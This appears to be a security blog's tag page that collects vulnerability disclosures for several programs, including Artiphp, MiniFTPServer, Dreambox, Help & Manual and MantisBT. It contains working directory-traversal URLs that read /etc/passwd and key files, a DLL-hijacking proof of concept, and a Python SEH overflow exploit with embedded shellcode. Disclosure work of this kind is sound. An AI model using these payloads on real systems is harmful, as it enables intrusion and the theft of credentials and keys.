Posts Tagged ‘ exploit ’
Artiphp stores database backups using backupDB() utility with a predictable file name inside the web root, which can be exploited to disclose sensitive information by downloading the file. The backup is located in ‘/artzone/artpublic/database/’ directory as ‘db_backup_[type].[yyyy-mm-dd].sql.gz’ filename.
Advisory ID: ZSL-2012-5091
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5091.php
The vulnerability is caused due to the Search box function not checking the boundary of user input. This can be exploited to cause a DoS due to memory exhaustion when inserting a long string of bytes (~80mil B / 80 MB) into the Search field in the GUI.
Advisory ID: ZSL-2012-5082
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5082.php
MiniFTPServer suffers from a denial of service vulnerability when passing large number of bytes after authentication, resulting in a crash. No need for a valid FTP command to exploit this issue.
dbg output:
(1540.918): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00e4f900 ebx=00000000 ecx=00000000 edx=00f163e8 esi=00e4f900 edi=055ef384
eip=031187d3 esp=055ef154 ebp=055ef394 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
031187d3 3909 cmp dword ptr [ecx],ecx ds:0023:00000000=????????
0:011> d edx
00f163e8 80 6a 9f 7a 28 f9 c5 00-00 00 00 00 64 f1 dc 00 .j.z(…….d…
00f163f8 54 72 f1 00 00 00 00 00-00 00 00 00 01 00 00 80 Tr…………..
00f16408 00 00 00 00 4c 64 f1 00-00 00 00 00 00 00 00 00 ….Ld……….
00f16418 18 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 …………….
00f16428 b0 f1 dc 00 01 00 00 00-00 00 00 00 00 00 00 00 …………….
00f16438 00 00 00 00 00 00 00 00-f4 01 00 00 50 f9 e4 00 …………P…
00f16448 00 00 00 00 68 b4 b9 79-00 00 00 00 70 64 f1 00 ….h..y….pd..
00f16458 00 00 00 00 00 00 00 00-00 00 00 00 80 72 f1 00 ………….r..
0:011> d
00f16468 00 00 00 00 00 00 00 00-f0 b0 5c 7b 00 00 00 00 ……….\{….
00f16478 80 9f b9 00 84 64 f1 00-00 00 01 00 60 9e b9 79 …..d……`..y
00f16488 c4 1a a0 00 00 00 00 00-00 00 00 00 ac f9 b9 79 ……………y
00f16498 f4 01 00 00 41 00 41 00-41 00 41 00 41 00 41 00 ….A.A.A.A.A.A.
00f164a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00f164b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00f164c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00f164d8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5040.php
Pacer Edition CMS suffers from multiple vulnerabilities including cross-site scripting, local file inclusion and arbitrary file deletion. You can view details of the issues on the following advisory links:
Pacer Edition CMS 2.1 (rm) Remote Arbitrary File Deletion Exploit [ZSL-2011-5017]
Pacer Edition CMS 2.1 Remote XSS POST Injection Vulnerability [ZSL-2011-5018]
Pacer Edition CMS 2.1 (l param) Local File Inclusion Vulnerability [ZSL-2011-5019]
Dreambox suffers from a file download vulnerability thru directory traversal with appending the ‘/’ character in the HTTP GET method of the affected host address. The attacker can get to sensitive information like paid channel keys, usernames, passwords, config and plug-ins info, etc.
http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd%00
http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../Autoupdate.key%00
http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../camd3.config%00
http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/keys/camd3.keys%00
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5013.php
Help & Manual Professional Edition 5.5.1 (ijl15.dll) DLL Hijacking Exploit
Vendor: EC Software GmbH
Product web page: http://www.helpandmanual.com
Affected version: 5.5.1 Build 1296
Summary: Help & Manual 5 is a single-source help authoring and content
management system for both single and multi-author editing.
Desc: Help & Manual suffers from a DLL hijacking vulnerability that enables
the attacker to execute arbitrary code on the affected machine. The vulnerable
extensions are hmxz, hmxp, hmskin, hmx, hm3, hpj, hlp and chm thru ijl15.dll
Intel’s library.
Tested on: Microsoft Windows XP Professional SP3 EN
Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
liquidworm gmail com
Advisory ID: ZSL-2011-5009
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5009.php
06.04.2011
#include
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int dll_mll()
{
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5009.php
DoceboLMS suffers from multiple stored XSS vulnerabilities pre and post auth. Input thru the POST parameters ‘name’, ‘code’ and ‘title’ in index.php is not sanitized allowing the attacker to execute HTML code into user’s browser session on the affected site. URI based XSS vulnerabilities are also present.
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5006.php
The program suffers from a buffer overflow vulnerability when openinng autorun file (.ini), as a result of adding extra bytes to parts of the edited file, giving the atackers the possibility for an arbitrary code execution on the affected system. Also the buffer overflow vulnerability allows the atacker to bypass Structured Exception Handling (SEH) protection mechanism.
———-code———-
from struct import *
import time
f=open(“AutoPlay.ini”,”w”)
shell=(“\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61”
“\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13”
“\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f”
“\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b”
“\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30”
“\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72”
“\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd”
“\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e”
“\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52”
“\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56”);
head=(“\x5b\x47\x65\x6e\x65\x72\x61\x6c\x5d\x0d\x0a\x54\x69\x74\x6c\x65”
“\x3d\x41\x20\x73\x61\x6d\x70\x6c\x65\x20\x6f\x66\x20\x77\x68\x61”
“\x74\x20\x41\x75\x74\x6f\x50\x6c\x61\x79\x20\x63\x61\x6e\x20\x64”
“\x6f\x21\x0d\x0a\x49\x63\x6f\x6e\x3d\x2e\x5c\x61\x75\x74\x6f\x70”
“\x6c\x61\x79\x2e\x69\x63\x6f\x0d\x0a\x53\x74\x61\x72\x74\x75\x70”
“\x53\x6f\x75\x6e\x64\x3d\x2e\x5c\x64\x72\x75\x6d\x72\x6f\x6c\x6c”
“\x2e\x77\x61\x76\x0d\x0a\x45\x78\x69\x74\x53\x6f\x75\x6e\x64\x3d”
“\x2e\x5c\x65\x78\x70\x6c\x6f\x64\x65\x2e\x77\x61\x76\x0d\x0a\x4e”
“\x75\x6d\x62\x65\x72\x4f\x66\x42\x75\x74\x74\x6f\x6e\x73\x3d\x37”
“\x0d\x0a\x42\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x42\x69\x74\x6d”
“\x61\x70\x3d\x2e\x5c\x73\x70\x6c\x61\x73\x68\x2e\x6a\x70\x67\x0d”
“\x0a\x4e\x75\x6d\x62\x65\x72\x4f\x66\x43\x6f\x6d\x62\x6f\x73\x3d”
“\x31\x0d\x0a\x0d\x0a\x5b\x42\x75\x74\x74\x6f\x6e\x31\x5d\x0d\x0a”
“\x43\x6f\x6d\x6d\x61\x6e\x64\x54\x79\x70\x65\x3d\x31\x0d\x0a\x43”
“\x6f\x6d\x6d\x61\x6e\x64\x3d\x65\x78\x70\x6c\x6f\x72\x65\x72\x2e”
“\x65\x78\x65\x0d\x0a\x46\x6c\x79\x62\x79\x53\x6f\x75\x6e\x64\x3d”
“\x2e\x5c\x68\x6f\x76\x65\x72\x73\x65\x6c\x2e\x77\x61\x76\x0d\x0a”
“\x4c\x65\x66\x74\x3d\x38\x33\x0d\x0a\x54\x6f\x70\x3d\x31\x33\x0d”
“\x0a\x54\x65\x78\x74\x43\x6f\x6c\x6f\x72\x3d\x32\x35\x35\x2c\x30”
“\x2c\x30\x0d\x0a\x48\x69\x67\x68\x6c\x69\x67\x68\x74\x43\x6f\x6c”
“\x6f\x72\x3d\x32\x35\x35\x2c\x32\x35\x35\x2c\x30\x0d\x0a\x43\x61”
“\x70\x74\x69\x6f\x6e\x3d\x52\x75\x6e\x20\x57\x69\x6e\x64\x6f\x77”
“\x73\x20\x45\x78\x70\x6c\x6f\x72\x65\x72\x0d\x0a\x46\x6f\x6e\x74”
“\x53\x69\x7a\x65\x3d\x32\x34\x0d\x0a\x46\x6f\x6e\x74\x4e\x61\x6d”
“\x65\x3d”)
junk=”\x41”*32
junk1=”\x41”*92
nseh=”\xeb\x06\x90\x90”
seh=”\x62\xce\x86\x7c” # pop pop ret
esp=”\x7b\x46\x86\x7c” # jmp esp
try:
f.write(head+junk+esp+junk1+nseh+seh+shell)
f.close()
print(“File created”)
except:
print(“File cannot be created”)
———-code———-
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4994.php
A buffer overflow vulnerability has been identified in Macro Express Pro, possibly this vuln may exist in the regular version and older versions of Macro Express and Macro Express Pro. We’ve reported the issue to the vendor thru their bug reporting system (http://www.macros.com/bugreport.htm) and did not receive any response for confirmation or cooperation.
We’ve managed to overwrite few registers while debugging the application, thus executed arbitrary code on the affected system.
You can take a look at the advisory here: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4986.php
Денеска, Zero Science Lab во соработка со MantisBT Group објави безбедносни предупредувања и закрпи за популарниот систем за следење на грешки или багови MantisBT (отворен код). Се работи за неколку сериозни ранливости со чија помош, напаѓачот може да дојде до осетливи информации на заразениот систем со пропатување на директориуми или пак да извршува HTML код во корисничкиот прелистувач со помош на XSS напад.
Слабоста се наоѓа во “upgrade_unattended.php” скриптата, која се наоѓа во “admin” папката. При повикување на параметарот “db_type” било со GET или POST методата, апликацијата не извшува доволно и контролирано санирање на корисничкото внесување при што се откриваат системски информации.
По дефинирање, се работи за Reflected (Non-persistent) Cross-Site Scripting, Local File Inclusion/Disclosure и Path Disclosure ранливости. Ние извршивме тестирање на “live” веб-страници (со дозвола), и заклучивме да ги рангираме ранливостите како Medium Risk (xss) и High Risk (lfi).
Голема благодарност до Дејвид Хикс и Виктор Боктор од MantisBT групата, кои одговорија на пријавените слабости и реагираа во најбрз временски период како и во објавување на закрпа и предупредувања после кое следеше објавување на 1.2.4 верзијата. Иако Дејвид напоменуваше дека имало “Warning” дека папката “admin” треба да се избрише после инсталација, јас такво предупредување не видов поради различните оперативни системи и PHP пермисии, и заклучивме дека многу инсталации на интернетот (кои користат MantisBT) се со присатен “admin” фолдер.
Освен јавно објавените предупредувања, објавивме и официјален Google Dork на Exploit-DB заедницата: http://www.exploit-db.com/ghdb/3651/
Предупредувањата од ZSL како и од MantisBT можете да ги погледнете подолу:
ZSL-2010-4983: MantisBT <=1.2.3 (db_type) Cross-Site Scripting & Path Disclosure Vulnerability
ZSL-2010-4983: MantisBT <=1.2.3 (db_type) Local File Inclusion Vulnerability
MantisBT: http://www.mantisbt.org/bugs/view.php?id=12607
Ажурирајте. ;}
IT.com.mk Exploit Database